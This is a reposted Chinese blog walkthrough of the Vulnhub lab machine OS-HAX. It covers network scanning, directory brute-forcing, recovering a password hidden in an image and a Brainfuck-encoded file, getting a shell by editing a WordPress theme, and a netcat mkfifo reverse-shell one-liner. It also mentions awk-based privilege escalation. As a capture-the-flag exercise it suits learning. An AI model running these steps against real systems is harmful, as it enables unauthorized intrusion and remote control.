【Vulnhub】靶机Os-Hax

admin 2022年1月10日03:33:44评论67 views字数 964阅读3分12秒阅读模式

前言

  • Vulnhub刷题简单记录

OS-HAX

描述

难度:中级

标志:引导根

学习:利用 | 网络应用安全| 权限提升

https://www.vulnhub.com/entry/hacknos-os-hax,389/

OS-HAX开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.1.108

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/

4、通过String查看img中的flaghost的图片,获取一个密码的信息passw@45

5、也可以用exiftool 来查看图片信息

6、接着猜测他是目录,发现了brainfuck加密,接着去解密http://192.168.1.102/passw@45/flag2.txt

1
2
3
4
i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
>--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
+++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<

image-20210923101446982

7、利用获取的账号和密码登陆wordpress后台改模板拿shell

image-20210923101819727

image-20210923102028521

7、用下面命令反弹shell

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&amp;1|nc 192.168.1.104 1234 >/tmp/f

image-20210923105501616

8、提权看下面截图,就是利用web的权限,执行awk命令来获取root权限

image-20210923110221578

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Vulnhub】靶机Os-Haxhttp://cn-sec.com/archives/730027.html

发表评论

匿名网友 填写信息